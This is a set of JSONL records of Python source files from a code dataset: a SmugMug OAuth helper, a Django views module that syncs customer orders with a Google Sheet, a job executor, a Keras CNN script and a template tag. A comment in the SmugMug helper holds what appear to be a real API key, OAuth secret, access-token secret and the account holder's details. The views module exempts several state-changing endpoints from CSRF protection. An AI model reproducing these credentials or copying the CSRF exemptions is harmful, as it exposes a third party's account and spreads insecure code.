\\w+)/$', 'agregarAmigo'),\n)\n","sub_path":"mensajesInstantaneos/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":455,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"452780957","text":"#!/usr/bin/env python\n\nfrom __future__ import print_function\nimport os\nfrom smugpy import SmugMug\nfrom smugphoto.helper.fileutil import FileUtil\n\n\nclass AuthUtil(object):\n def __init__(self, api_key=None, oauth_secret=None, apiKeyDir=None, accessKeyDir=None):\n self.api_key = api_key\n self.oauth_secret = oauth_secret\n self.app_name = 'MySmug'\n self._apiKeyDir = apiKeyDir\n self._accessKeyDir = accessKeyDir\n self.access_token = None\n\n def _smugmugOauthRequestToken(self, access=\"Public\", perm=\"Read\"):\n smugmug = SmugMug(api_key=self.api_key, oauth_secret=self.oauth_secret, app_name=self.app_name)\n\n # Get a token that is short-lived (probably about 5 minutes) and can be used\n # only to setup authorization at SmugMug\n response = smugmug.auth_getRequestToken()\n\n # Get the URL that the user must visit to authorize this app (implicilty includes the request token in the URL)\n url = smugmug.authorize(access=access, perm=perm)\n return url, response['Auth'] # (should contain a 'Token')\n\n @staticmethod\n def _userAuthorizeAtSmugmug(url):\n input(\"Authorize app at %s\\n\\nPress Enter when complete.\\n\" % (url))\n\n def _smugmugOauthGetAccessToken(self, requestToken):\n # Use the request token to log in (which should be authorized now)\n smugmug = SmugMug(api_key=self.api_key, oauth_secret=self.oauth_secret,\n oauth_token=requestToken['Token']['id'],\n oauth_token_secret=requestToken['Token']['Secret'],\n app_name=self.app_name)\n\n # The request token is good for 1 operation: to get an access token.\n response = smugmug.auth_getAccessToken()\n\n # The access token should be good until the user explicitly\n # disables it at smugmug.com in their settings panel.\n return response['Auth']\n\n # Log into smugmug.com with an authorized accessToken. The accessToken includes\n # the user's identity and, effectively, a password to get this application into\n # the account.\n def _smugmugOauthUseAccessToken(self, accessToken):\n # Use the access token to log in\n smugmug = SmugMug(api_key=self.api_key, oauth_secret=self.oauth_secret,\n oauth_token=accessToken['Token']['id'],\n oauth_token_secret=accessToken['Token']['Secret'],\n app_name=self.app_name)\n return smugmug\n\n def getSmug(self):\n # try to read\n self._loadAPIKey()\n\n try:\n access_token = FileUtil.readYamlToDict(self.accessKeyDir)\n if access_token is None:\n access_token = self._tryToGetAccessKeyFromAPIKey()\n except FileExistsError:\n access_token = self._tryToGetAccessKeyFromAPIKey()\n\n self.access_token = access_token\n\n return self._smugmugOauthUseAccessToken(access_token)\n\n\n def _tryToGetAccessKeyFromAPIKey(self):\n (url, requestToken) = self._smugmugOauthRequestToken()\n self._userAuthorizeAtSmugmug(url)\n access_token = self._smugmugOauthGetAccessToken(requestToken)\n FileUtil.writeDictToYaml(access_token, self.accessKeyDir)\n\n return access_token\n\n def _loadAPIKey(self):\n keys = FileUtil.readYamlToDict(self.apiKeyDir)\n self.api_key = keys[\"API Key\"]\n self.oauth_secret = keys['Oauth Secret']\n self.app_name = keys[\"App Name\"]\n\n @property\n def accessKeyDir(self):\n if self._apiKeyDir is None:\n return os.path.abspath(os.path.join(os.getcwd(), r'..\\..\\tests\\auth\\oauth_access.yaml'))\n else:\n return os.path.join(os.path.abspath(self._accessKeyDir), r'..\\..\\tests\\auth\\oauth_access.yaml')\n\n @property\n def apiKeyDir(self):\n if self._apiKeyDir is None:\n return os.path.abspath(os.path.join(os.getcwd(), r'..\\..\\tests\\auth\\keys.yaml'))\n else:\n return os.path.join(os.path.abspath(self._apiKeyDir), r'..\\..\\tests\\auth\\'keys.yaml')\n\n # def saveAccessToken(self, accessDict, accessKeyDir=None):\n # if accessKeyDir is None:\n # filepath = os.path.abspath(os.path.join(os.getcwd(), 'access_key.yaml'))\n # else:\n # filepath = os.path.join(os.path.abspath(accessKeyDir), 'access_key.yaml')\n #\n # FileUtil.writeDictToYaml(accessDict, filepath)\n #\n # def readAccessToken(self, accessKeyDir=None):\n # if accessKeyDir is None:\n # filepath = os.path.abspath(os.path.join(os.getcwd(), 'access_key.yaml'))\n # else:\n # filepath = os.path.join(os.path.abspath(accessKeyDir), 'access_key.yaml')\n #\n # return FileUtil.readYamlToDict(filepath)\n\n\nif __name__ == '__main__':\n # ###\n # ### Main\n # ###\n # API_KEY = \"Ai1WhX5ErNtHYR5YFg4qFAiww6PGZs1d\"\n # OAUTH_SECRET = \"968d0e37c50b47a2ca04b28da556a8f0\" # From SmugMug Settings -> Discovery -> API Keys\n # APP_NAME = \"mySmugTest\"\n # myAccessToken = {'User': {'Name': 'Huy Le',\n # 'URL': 'https://hizzle.smugmug.com',\n # 'id': 1813307, 'AccountType': 'Portfolio',\n # 'SmugVault': False,\n # 'FileSizeLimit': 157286400,\n # 'AccountStatus': 'Active',\n # 'NickName': 'Hizzle'},\n # 'Token': {'Secret': 'e0d8224bcb517f481ebd7a7aca751fe3d34fd657f82e998f2816f1d76424a0b3',\n # 'id': '5635a8a6c820780ddf1a5abf13a6a07b',\n # 'Access': 'Public',\n # 'Permissions': 'Read'}}\n\n mySmug = AuthUtil().getSmug()\n\n albums = mySmug.albums_get()\n for album in albums[\"Albums\"]:\n print(\"{}, {}\".format(album[\"id\"], album[\"Title\"]))\n","sub_path":"smugphoto/helper/auth.py","file_name":"auth.py","file_ext":"py","file_size_in_byte":6018,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"522473212","text":"import datetime\nimport json\nimport os\nimport sys\n\nfrom django.contrib.auth import logout as auth_logout\nfrom django.contrib.auth.decorators import login_required\nfrom django.core.urlresolvers import reverse\nfrom django.http import HttpResponse, HttpResponseRedirect, Http404\nfrom django.shortcuts import render, get_list_or_404, redirect\nfrom django.views import generic\nfrom django.views.decorators import csrf\nfrom oauth2client import client\nfrom oauth2client.service_account import ServiceAccountCredentials\nfrom distutils.util import strtobool\n\nfrom mysite.settings import PROJECT_ROOT\nfrom .fetch_data import update_database\nfrom .google_manipulation import read_bgColor, sheet_authorization, get_sheet\nfrom .google_manipulation import write_sheet, write_cell\nfrom .models import Customer, Orders\n\n# Create your views here.\n\nINFO_SHIPPED = {\n 'action': 'changeBackgroundColor',\n 'sheetId': 309611827,\n 'startRowIndex': 1835,\n 'endRowIndex': 1836,\n 'startColumnIndex': 10,\n 'endColumnIndex': 11,\n 'red': 0.98823529,\n 'green': 0.89803922,\n 'blue': 0.80392158\n}\n\nINFO_PARTIAL = {\n 'action': 'changeBackgroundColor',\n 'sheetId': 309611827,\n 'startRowIndex': 1835,\n 'endRowIndex': 1836,\n 'startColumnIndex': 10,\n 'endColumnIndex': 11,\n 'red': 0.81568629,\n 'green': 0.87843138,\n 'blue': 0.89019608\n}\n\n\nclass Index(generic.TemplateView):\n template_name = \"kelly/old/index.html\"\n\n\ndef search(request):\n if not request.method == 'POST':\n return render(request, 'kelly/index.html', {\n 'error_message': '你並未輸入任何關鍵字。'\n })\n\n keyword_type = request.POST['keyword_type']\n keyword = request.POST['keyword']\n\n if not keyword or keyword == \"\" or keyword is None:\n return render(request, 'kelly/index.html', {\n 'error_message': '你並未輸入任何關鍵字。'\n })\n\n switch = {\n 'name': select_by_name(keyword),\n 'Facebook': select_by_facebook(keyword),\n 'bank': select_by_bank(keyword),\n 'amount': select_by_amount(keyword),\n 'transfer_date': select_by_transfer_date(keyword),\n 'order': select_by_order(keyword)\n }\n\n result = switch.get(keyword_type, None)\n if not result:\n return render(request, 'kelly/index.html', {\n 'error_message': \"找不到紀錄。\"\n })\n elif result is None:\n return render(request, \"kelly/index.html\", {\n 'error_message': \"找不到紀錄。\"\n })\n else:\n if type(result[0]) == Customer:\n customer = result\n # return HttpResponseRedirect(reverse('kelly:results', kwargs={'customer': customer}))\n return HttpResponseRedirect(reverse('kelly:cus_detail', args=(customer[0].id,)))\n # return render(request, 'kelly/results.html', {'customer': customer})\n else:\n orders = result\n # return HttpResponseRedirect(reverse('kelly:results', kwargs={'customer': customer}))\n return render(request, 'kelly/results.html', {'orders': orders})\n\n\ndef select_by_name(_name):\n try:\n result = get_list_or_404(Customer, customer_name__contains=_name)\n except Http404:\n return False\n return result\n\n\ndef select_by_facebook(_facebook):\n try:\n result = get_list_or_404(Customer, customer_Facebook__contains=_facebook)\n except Http404:\n return False\n return result\n\n\ndef select_by_bank(_bank):\n try:\n result = get_list_or_404(Orders, bank__contains=_bank)\n except Http404:\n return False\n return result\n\n\ndef select_by_amount(_p_amount):\n try:\n _amount = int(_p_amount)\n result = get_list_or_404(Orders, amount=_amount)\n except (Http404, ValueError):\n return False\n return result\n\n\ndef select_by_transfer_date(_p_transfer_date):\n try:\n _transfer_date = datetime.datetime.strptime(_p_transfer_date, '%m/%d/%Y')\n result = get_list_or_404(Orders, transfer_date=_transfer_date)\n except (Http404, ValueError):\n return False\n return result\n\n\ndef select_by_order(_order):\n try:\n result = get_list_or_404(Orders, order_content__contains=_order)\n except Http404:\n try:\n result = get_list_or_404(Orders, order_model__contains=_order)\n except Http404:\n return False\n return result\n\n\nclass CustomerDetailView(generic.DetailView):\n model = Customer\n template_name = 'kelly/old/cus_detail.html'\n\n\ndef show_angular(request):\n return render(request, 'kelly/old/angular/index.html')\n\n\ndef js_index(request):\n return render(request, 'kelly/index.html', {'user': request.user})\n\n\ndef js_welcome(request):\n return render(request, 'kelly/welcome.html')\n\n\ndef js_search(request):\n\n if not request.session.get('dataFetched'):\n fetch(request)\n request.session['dataFetched'] = True\n request.session.set_expiry(600)\n\n return render(request, 'kelly/search.html')\n\n\ndef js_control(request):\n return render(request, 'kelly/control.html')\n\n\n@csrf.csrf_protect\ndef ajax_search(request):\n if request.method == 'POST':\n try:\n csrf_str = request.POST.get('csrfmiddlewaretoken', False)\n keyword_type = request.POST.get('keyword_type', False)\n keyword = request.POST.get('keyword', False)\n return render(request, 'kelly/old/ajax_test.html', {'msg': request})\n except:\n e = sys.exc_info()\n return render(request, 'kelly/old/ajax_test.html', {'msg': str(e)})\n else:\n return render(request, 'kelly/old/ajax_test.html')\n\n\n@csrf.csrf_exempt\ndef test_post(request):\n if request.method == 'GET':\n\n order = Orders.objects.all().values()\n\n myDict = dict()\n myList = list()\n\n for _var in order:\n myDict = _var\n realName, faceBook, phone = get_customer_data(_var['customer_id'])\n myDict['customer_name'] = realName\n myDict['customer_Facebook'] = faceBook\n myDict['customer_phone'] = phone\n\n myStr = datetime.datetime.strftime(myDict['transfer_date'], '%Y. %m. %d')\n intYear = int(myStr[0:4]) - 1911\n remains = myStr[4:]\n myFinalDate = str(intYear) + remains\n\n myDict['transfer_date'] = myFinalDate\n # myDict['bank'] = str(myDict['bank']).replace('-', ' | ')\n\n myList.append(myDict)\n\n jsonText = json.dumps(myList)\n\n return HttpResponse(jsonText, {'user': request.user})\n\n elif request.method == 'POST':\n\n string = request.body\n string = string.decode('utf-8')\n myDict = json.loads(string)\n\n if myDict['action'] and myDict['action'] == 'shipping':\n\n service_account_access(request)\n\n spreadsheet_service = sheet_authorization(request, use_service=True)\n\n # if not spreadsheet_service:\n # return HttpResponseRedirect(reverse('kelly:oauth2callback'))\n\n order = Orders.objects.get(pk=myDict['id'])\n if myDict.get('isShipped') == 'partial':\n order.isShipped = False\n order.isPartialShipped = True\n else:\n order.isShipped = myDict['isShipped']\n order.isPartialShipped = False\n order.save()\n\n info = None\n values = list()\n _content = list()\n\n if not order.isShipped and order.isPartialShipped:\n info = INFO_PARTIAL\n _content.append('Partial')\n values.append(_content)\n else:\n info = INFO_SHIPPED\n _content.append(str(order.isShipped).upper())\n values.append(_content)\n\n info['startRowIndex'] = order.id + 1834\n info['endRowIndex'] = order.id + 1835\n\n if not order.isShipped and not order.isPartialShipped:\n info['red'], info['green'], info['blue'] = 1.0, 1.0, 1.0\n\n result = write_sheet(spreadsheet_service, 'kelly', info)\n result2 = write_cell(spreadsheet_service, 'kelly',\n range='Form Responses 2!M%i:M%i' % (order.id + 1835, order.id + 1835),\n majorDimension='ROWS',\n values=values)\n\n return HttpResponse('%s %s' % (str(result), str(result2)))\n\n elif myDict['action'] and myDict['action'] == 'update':\n\n service_account_access(request)\n\n spreadsheet_service = sheet_authorization(request, use_service=True)\n\n response = ''\n\n for single_order in myDict['allData']:\n order = Orders.objects.get(pk=single_order['id'])\n affected = 0\n for col in single_order.keys():\n\n try:\n\n if isinstance(getattr(order, col), int) and not isinstance(getattr(order, col), bool):\n\n if getattr(order, col) != int(single_order[col]):\n setattr(order, col, int(single_order[col]))\n affected += 1\n else:\n continue\n\n elif isinstance(getattr(order, col), bool):\n\n if str(single_order[col]) == 'partial' and not order.isPartialShipped:\n order.isPartialShipped = True\n order.isShipped = False\n affected += 1\n else:\n current_status = strtobool(single_order[col]) \\\n if not isinstance(single_order[col], bool) \\\n else single_order[col]\n\n if getattr(order, col) != single_order[col]:\n setattr(order, col, current_status)\n order.isPartialShipped = False\n affected += 1\n else:\n continue\n\n elif isinstance(getattr(order, col), datetime.date):\n\n _strDate = str(int(single_order[col][:3]) + 1911) + single_order[col][3:]\n current_date = datetime.datetime.strptime(_strDate, '%Y. %m. %d')\n current_date = datetime.date(current_date.year, current_date.month, current_date.day)\n\n if getattr(order, col) != current_date:\n setattr(order, col, current_date)\n affected += 1\n else:\n continue\n\n else:\n\n if getattr(order, col) != single_order[col]:\n setattr(order, col, single_order[col])\n affected += 1\n else:\n continue\n\n except AttributeError:\n\n customer = order.customer\n\n if isinstance(getattr(customer, col), int) and not isinstance(getattr(customer, col), bool):\n if getattr(customer, col) != int(single_order[col]):\n setattr(customer, col, int(single_order[col]))\n customer.save()\n affected += 1\n else:\n continue\n else:\n if getattr(customer, col) != single_order[col]:\n setattr(customer, col, single_order[col])\n customer.save()\n affected += 1\n else:\n continue\n\n order.save()\n\n if affected > 0:\n\n info = None\n values = list()\n\n _content = [\n order.customer.customer_name,\n order.customer.customer_Facebook,\n order.bank,\n order.last_five,\n order.amount,\n datetime.datetime.strftime(order.transfer_date, '%m/%d/%Y'),\n order.zip_code,\n order.address,\n order.customer.customer_phone,\n order.order_content,\n order.order_model,\n order.isShipped\n ]\n\n if not order.isShipped and order.isPartialShipped:\n info = INFO_PARTIAL\n _content[-1] = 'Partial'\n values.append(_content)\n else:\n info = INFO_SHIPPED\n _content[-1] = (str(order.isShipped).upper())\n values.append(_content)\n\n info['startRowIndex'] = order.id + 1834\n info['endRowIndex'] = order.id + 1835\n\n if not order.isShipped and not order.isPartialShipped:\n info['red'], info['green'], info['blue'] = 1.0, 1.0, 1.0\n\n result = write_sheet(spreadsheet_service, 'kelly', info)\n result2 = write_cell(spreadsheet_service, 'kelly',\n range='Form Responses 2!B%i:M%i' % (order.id + 1835, order.id + 1835),\n majorDimension='ROWS',\n values=values)\n\n response += '%s %s' % (str(result), str(result2))\n\n return HttpResponse(response + ' Success.')\n\n else:\n\n var = ''\n\n for _str in myDict.keys():\n var += '%s: %s' % (_str, string[_str])\n\n return HttpResponse(var)\n\n\ndef get_customer_data(customer_id):\n realName = Customer.objects.get(id=customer_id).customer_name\n faceBook = Customer.objects.get(id=customer_id).customer_Facebook\n phone = Customer.objects.get(id=customer_id).customer_phone\n\n return realName, faceBook, phone\n\n\n@csrf.csrf_exempt\ndef oauth2callback(request):\n scope = 'https://www.googleapis.com/auth/spreadsheets'\n flow = client.flow_from_clientsecrets(os.path.join(PROJECT_ROOT, 'client_secret.json'),\n scope=scope,\n redirect_uri='http://kelly8118.xyz:8080/kelly/oauth2callback/')\n\n if not request.GET.get('code', False):\n auth_uri = flow.step1_get_authorize_url()\n return HttpResponseRedirect(auth_uri)\n else:\n auth_code = request.GET['code']\n credentials = flow.step2_exchange(auth_code)\n request.session['credentials'] = credentials.to_json()\n return HttpResponseRedirect(reverse('kelly:show_data'))\n\n\n@csrf.csrf_exempt\ndef service_account_access(request):\n scopes = 'https://www.googleapis.com/auth/spreadsheets'\n\n credentials = ServiceAccountCredentials.from_json_keyfile_name(\n os.path.join(PROJECT_ROOT, 'My Project-d78da7467a28.json'),\n scopes=scopes)\n request.session['credentials'] = credentials.to_json()\n\n return HttpResponse(request.session['credentials'])\n\n\n@csrf.csrf_exempt\ndef write_data(request):\n spreadsheet_service = sheet_authorization(request)\n\n if not spreadsheet_service:\n return HttpResponseRedirect(reverse('kelly:oauth2callback'))\n\n result = get_sheet(spreadsheet_service, 'kelly',\n 'Form Responses 2!K1911:K1915', getValue=False)\n\n sheets = result.get('sheets', [])\n\n if not sheets:\n return HttpResponse('No data found.')\n else:\n output = read_bgColor(sheets, as_string=False, as_255=False)\n return HttpResponse(output)\n\n # if not request.session.get('credentials', False):\n # return HttpResponseRedirect(reverse('kelly:oauth2callback'))\n #\n # credentials = client.OAuth2Credentials.from_json(request.session['credentials'])\n #\n # if credentials.access_token_expired:\n # return HttpResponseRedirect(reverse('kelly:oauth2callback'))\n # else:\n # http_auth = credentials.authorize(httplib2.Http())\n # discoveryUrl = ('https://sheets.googleapis.com/$discovery/rest?'\n # 'version=v4')\n # spreadsheet_service = discovery.build('sheets', 'v4', http=http_auth,\n # discoveryServiceUrl=discoveryUrl)\n # spreadsheetId = '1EKRGi8EmPIO1yUNGuh7L7m9VrDP3YLDYcX6UspM1Lns'\n # rangeName = 'Form Responses 2!K1884:L1885'\n #\n # result = spreadsheet_service.spreadsheets().get(\n # spreadsheetId=spreadsheetId,\n # ranges=rangeName,\n # includeGridData=True).execute()\n # sheets = result.get('sheets', [])\n # output = None\n # if not sheets:\n # return HttpResponse('No data found.')\n # else:\n # # for _sheet in sheets:\n # # _data = _sheet['data'] # A list\n # # for i in _data:\n # # _rowData = i['rowData']\n # # for j in _rowData:\n # # _values = j['values']\n # # for _cellData in _values:\n # # _effectiveFormat = _cellData['effectiveFormat']\n # # _backgroundColor = _effectiveFormat['backgroundColor']\n # # for _key in _backgroundColor.keys():\n # # output += '%s: %s' % (_key, _backgroundColor[_key]) + ' '\n # # output += \"\"\n # output = read_bgColor(sheets, as_string=True, as_255=True)\n # return HttpResponse(output)\n\n\n@csrf.csrf_exempt\ndef write_color(request):\n spreadsheet_service = sheet_authorization(request)\n\n if not spreadsheet_service:\n return HttpResponseRedirect(reverse('kelly:oauth2callback'))\n\n info = {\n 'action': 'changeBackgroundColor',\n 'sheetId': 309611827,\n 'startRowIndex': 1836,\n 'endRowIndex': 1837,\n 'startColumnIndex': 10,\n 'endColumnIndex': 11,\n 'red': 0.81568629,\n 'green': 0.87843138,\n 'blue': 0.89019608\n }\n\n result = write_sheet(spreadsheet_service, 'kelly', info)\n\n return HttpResponse(str(result))\n\n # if not request.session.get('credentials', False):\n # return HttpResponseRedirect(reverse('kelly:oauth2callback'))\n #\n # credentials = client.OAuth2Credentials.from_json(request.session['credentials'])\n #\n # if credentials.access_token_expired:\n # return HttpResponseRedirect(reverse('kelly:oauth2callback'))\n # else:\n # http_auth = credentials.authorize(httplib2.Http())\n # discoveryUrl = ('https://sheets.googleapis.com/$discovery/rest?'\n # 'version=v4')\n # spreadsheet_service = discovery.build('sheets', 'v4', http=http_auth,\n # discoveryServiceUrl=discoveryUrl)\n # spreadsheetId = '1EKRGi8EmPIO1yUNGuh7L7m9VrDP3YLDYcX6UspM1Lns'\n # rangeName = 'Form Responses 2!K1836:K1836'\n # body = {\n # 'requests': [\n # {\n # 'addConditionalFormatRule': {\n # 'rule': {\n # 'ranges': [\n # {\n # 'sheetId': 309611827,\n # 'startRowIndex': 1836,\n # 'endRowIndex': 1837,\n # 'startColumnIndex': 10,\n # 'endColumnIndex': 11\n # }\n # ],\n # 'booleanRule': {\n # 'condition': {\n # 'type': 'NOT_BLANK',\n # 'values': []\n # },\n # 'format': {\n # 'backgroundColor': {\n # 'red': 0.81568629,\n # 'green': 0.87843138,\n # 'blue': 0.89019608\n # }\n # }\n # }\n # },\n # 'index': 0\n # }\n # }\n # ]\n # }\n #\n # result = spreadsheet_service.spreadsheets()\\\n # .batchUpdate(spreadsheetId=spreadsheetId, body=body).execute()\n # return HttpResponse(str(result))\n\n\n@csrf.csrf_exempt\ndef show_data(request):\n if not check_oauth2(request):\n return redirect(reverse('kelly:oauth2callback'))\n\n spreadsheet_service = sheet_authorization(request)\n\n if not spreadsheet_service:\n return HttpResponseRedirect(reverse('kelly:oauth2callback'))\n\n result = get_sheet(spreadsheet_service, 'kelly', 'Form Responses 2!B1836:M3000')\n\n if not result:\n return HttpResponse('No data found.')\n else:\n output = update_database(result, spreadsheet_service)\n affected, partial, created, error_count = output.get('affected'), \\\n output.get('partial'), \\\n output.get('created'), \\\n output.get('error_count')\n myStr = 'Affected: %r, Created: %r, Partially shipped: %r, Error: %r' % \\\n (affected, created, partial, error_count)\n return HttpResponse(myStr)\n\n # if credentials.access_token_expired:\n # return HttpResponseRedirect(reverse('kelly:oauth2callback'))\n # else:\n # http_auth = credentials.authorize(httplib2.Http())\n # discoveryUrl = ('https://sheets.googleapis.com/$discovery/rest?'\n # 'version=v4')\n # spreadsheet_service = discovery.build('sheets', 'v4', http=http_auth,\n # discoveryServiceUrl=discoveryUrl)\n # spreadsheetId = '1EKRGi8EmPIO1yUNGuh7L7m9VrDP3YLDYcX6UspM1Lns'\n # rangeName = 'Form Responses 2!B1836:M3000'\n #\n # result = spreadsheet_service.spreadsheets().values().get(\n # spreadsheetId=spreadsheetId, range=rangeName).execute()\n # values = result.get('values', [])\n #\n # if not values:\n # return HttpResponse('No data found.')\n # else:\n # orders = Orders.objects.all()\n # index = 0\n # affected = 0\n # error_count = 0\n # created = 0\n # partial = 0\n # myOrder = None\n #\n # for row in values:\n # try:\n # myOrder = orders[index]\n # myOrder.bank = row[2]\n # myOrder.last_five = row[3]\n # myOrder.amount = row[4]\n # myOrder.transfer_date = datetime.datetime.strptime(row[5], '%m/%d/%Y')\n # myOrder.zip_code = row[6]\n # myOrder.address = row[7]\n # myOrder.order_content = row[9]\n # myOrder.order_model = row[10]\n # myOrder.order_belong = row[0]\n # if not find_customer(myOrder.order_belong):\n # customer = Customer()\n # customer.customer_name = myOrder.order_belong\n # customer.customer_Facebook = row[1]\n # customer.customer_phone = row[8]\n # customer.save()\n # myOrder.customer_id = Customer.objects.get(customer_name=myOrder.order_belong).id\n # else:\n # myOrder.customer_id = Customer.objects.get(customer_name=myOrder.order_belong).id\n # try:\n # myOrder.isShipped = strtobool(row[11])\n # except ValueError:\n # if row[11] == 'Partial':\n # myOrder.isShipped = False\n # myOrder.isPartialShipped = True\n # myOrder.save()\n # print('Partially shipped order: %s\\n' % (str(row)))\n # partial += 1\n # affected += 1\n # index += 1\n # continue\n # else:\n # print('Cannot fetch the data: IsShipped. Row: %s\\n' % (str(row)))\n # error_count += 1\n # index += 1\n # continue\n # myOrder.save()\n # affected += 1\n # index += 1\n # except IndexError:\n # if not row:\n # break\n # myDate = datetime.datetime.strptime(row[5], '%m/%d/%Y')\n # order = Orders()\n # order.bank = row[2]\n # order.last_five = row[3]\n # order.amount = row[4]\n # order.transfer_date = myDate\n # order.zip_code = row[6]\n # order.address = row[7]\n # order.order_content = row[9]\n # order.order_model = row[10]\n # order.order_belong = row[0]\n # if not find_customer(order.order_belong):\n # customer = Customer()\n # customer.customer_name = order.order_belong\n # customer.customer_Facebook = row[1]\n # customer.customer_phone = row[8]\n # customer.save()\n # order.customer_id = Customer.objects.get(customer_name=order.order_belong).id\n # else:\n # order.customer_id = Customer.objects.get(customer_name=order.order_belong).id\n # try:\n # order.isShipped = strtobool(row[11])\n # except ValueError:\n # if row[11] == 'Partial':\n # order.isShipped = False\n # order.isPartialShipped = True\n # order.save()\n # print('Partially shipped order: %s\\n' % (str(row)))\n # partial += 1\n # created += 1\n # index += 1\n # continue\n # else:\n # print('Cannot fetch the data: IsShipped. Row: %s\\n' % (str(row)))\n # error_count += 1\n # index += 1\n # continue\n # order.save()\n # created += 1\n # index += 1\n # continue\n #\n # myStr = 'Affected: %i, Created: %i, Partially shipped: %i, Error: %i' %\\\n # (affected, created, partial, error_count)\n # return HttpResponse(myStr)\n\n\n@csrf.csrf_exempt\ndef fetch(request):\n service_account_access(request)\n\n spreadsheet_service = sheet_authorization(request, use_service=True)\n\n result = get_sheet(spreadsheet_service, 'kelly', 'Form Responses 2!B1836:M3000')\n\n if not result:\n return HttpResponse('No data found.')\n else:\n output = update_database(result, spreadsheet_service)\n affected, partial, created, error_count = output.get('affected'), \\\n output.get('partial'), \\\n output.get('created'), \\\n output.get('error_count')\n myStr = 'Affected: %r, Created: %r, Partially shipped: %r, Error: %r' % \\\n (affected, created, partial, error_count)\n return HttpResponse(myStr)\n\n\ndef logout(request):\n auth_logout(request)\n return redirect(reverse('kelly:index'))\n\n\ndef check_oauth2(request):\n try:\n check = isinstance(client.OAuth2Credentials.from_json(request.session.get('credentials')),\n client.OAuth2Credentials)\n except ValueError:\n return False\n\n return check\n","sub_path":"kelly/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":29494,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"488336604","text":"import os\nimport queue\nfrom concurrent.futures import Future, Executor as FutureExecutor\n\nfrom pympipool import cancel_items_in_queue, RaisingThread\nfrom pysqa.executor.helper import (\n reload_previous_futures,\n find_executed_tasks,\n serialize_funct,\n write_to_file,\n)\n\n\nclass Executor(FutureExecutor):\n def __init__(self, cwd=None, queue_adapter=None, queue_adapter_kwargs=None):\n self._task_queue = queue.Queue()\n self._memory_dict = {}\n self._cache_directory = os.path.abspath(os.path.expanduser(cwd))\n self._queue_adapter = queue_adapter\n reload_previous_futures(\n future_queue=self._task_queue,\n future_dict=self._memory_dict,\n cache_directory=self._cache_directory,\n )\n command = (\n \"python -m pysqa.executor --cores \"\n + str(queue_adapter_kwargs[\"cores\"])\n + \" --path \"\n + str(self._cache_directory)\n )\n self._queue_id = self._queue_adapter.submit_job(\n working_directory=self._cache_directory,\n command=command,\n **queue_adapter_kwargs\n )\n self._process = RaisingThread(\n target=find_executed_tasks,\n kwargs={\n \"future_queue\": self._task_queue,\n \"cache_directory\": self._cache_directory,\n },\n )\n self._process.start()\n\n def submit(self, fn, *args, **kwargs):\n funct_dict = serialize_funct(fn, *args, **kwargs)\n key = list(funct_dict.keys())[0]\n if key not in self._memory_dict.keys():\n self._memory_dict[key] = Future()\n _ = write_to_file(\n funct_dict=funct_dict, state=\"in\", cache_directory=self._cache_directory\n )[0]\n self._task_queue.put({key: self._memory_dict[key]})\n return self._memory_dict[key]\n\n def shutdown(self, wait=True, *, cancel_futures=False):\n if cancel_futures:\n cancel_items_in_queue(que=self._task_queue)\n self._task_queue.put({\"shutdown\": True, \"wait\": wait})\n self._queue_adapter.delete_job(process_id=self._queue_id)\n self._process.join()\n","sub_path":"pysqa/executor/executor.py","file_name":"executor.py","file_ext":"py","file_size_in_byte":2183,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"368858235","text":"from __future__ import print_function\n\nimport tensorflow as tf\nfrom PhotoHandler import get_training_set_and_test_set\nfrom PhotoHandler import get_CNN_training_set_and_test_set\nfrom PhotoHandler import CNN_jpg_width\nfrom PhotoHandler import CNN_jpg_height\n\nimport sys\n\ndp1 = float(sys.argv[1])\ndp2 = float(sys.argv[2])\nprint(\"For Dropout_1=%.1f Dropout_2=%.1f\" % (dp1, dp2))\n\n# (x_train, y_train),(x_test, y_test) = get_training_set_and_test_set()\n(x_train, y_train),(x_test, y_test) = get_CNN_training_set_and_test_set()\nx_train, x_test = x_train / 255.0, x_test / 255.0\n\n# model = tf.keras.models.Sequential([\n# tf.keras.layers.Flatten(input_shape=(30000, )),\n# tf.keras.layers.Dense(512, activation=tf.nn.relu),\n# tf.keras.layers.Dropout(0.2),\n# tf.keras.layers.Dense(5, activation=tf.nn.softmax)\n# ])\n\n# CNN Model\nmodel = tf.keras.models.Sequential([\n tf.keras.layers.Conv2D(128, (3, 3), input_shape=(CNN_jpg_width, CNN_jpg_height, 3), activation=tf.nn.relu),\n tf.keras.layers.Conv2D(128, (3, 3), activation=tf.nn.relu),\n tf.keras.layers.MaxPool2D(),\n tf.keras.layers.Dropout(dp1),\n tf.keras.layers.Flatten(),\n tf.keras.layers.Dense(512, activation=tf.nn.relu),\n tf.keras.layers.Dropout(dp2),\n tf.keras.layers.Dense(5, activation=tf.nn.softmax)\n])\n\nmodel.compile(optimizer='adam',\n loss='sparse_categorical_crossentropy',\n metrics=['accuracy'])\n\nmodel.fit(x_train, y_train, epochs=1)\nmodel.evaluate(x_test, y_test)\nmodel.fit(x_train, y_train, epochs=1)\nmodel.evaluate(x_test, y_test)\nmodel.fit(x_train, y_train, epochs=1)\nmodel.evaluate(x_test, y_test)\nmodel.fit(x_train, y_train, epochs=1)\nmodel.evaluate(x_test, y_test) # ------------------------ BEST: dp1=0.6, dp2=0.6 and acc=0.6081 loss=1.0303\nmodel.fit(x_train, y_train, epochs=1)\nmodel.evaluate(x_test, y_test)","sub_path":"Version/3.0/KerasNetwork.py","file_name":"KerasNetwork.py","file_ext":"py","file_size_in_byte":1833,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"42258061","text":"from django import template\nfrom newItem.models import Image\n\nregister = template.Library()\n\n\ndef imageMini(productid):\n\tallImage = Image.objects.all()\n\tallImage = allImage.filter(numberProduct = productid)\n\timage = allImage[0]\n\treturn image.link\n\t\nregister.filter('imageMini', imageMini)","sub_path":"newtags/templatetags/imgTags.py","file_name":"imgTags.py","file_ext":"py","file_size_in_byte":288,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
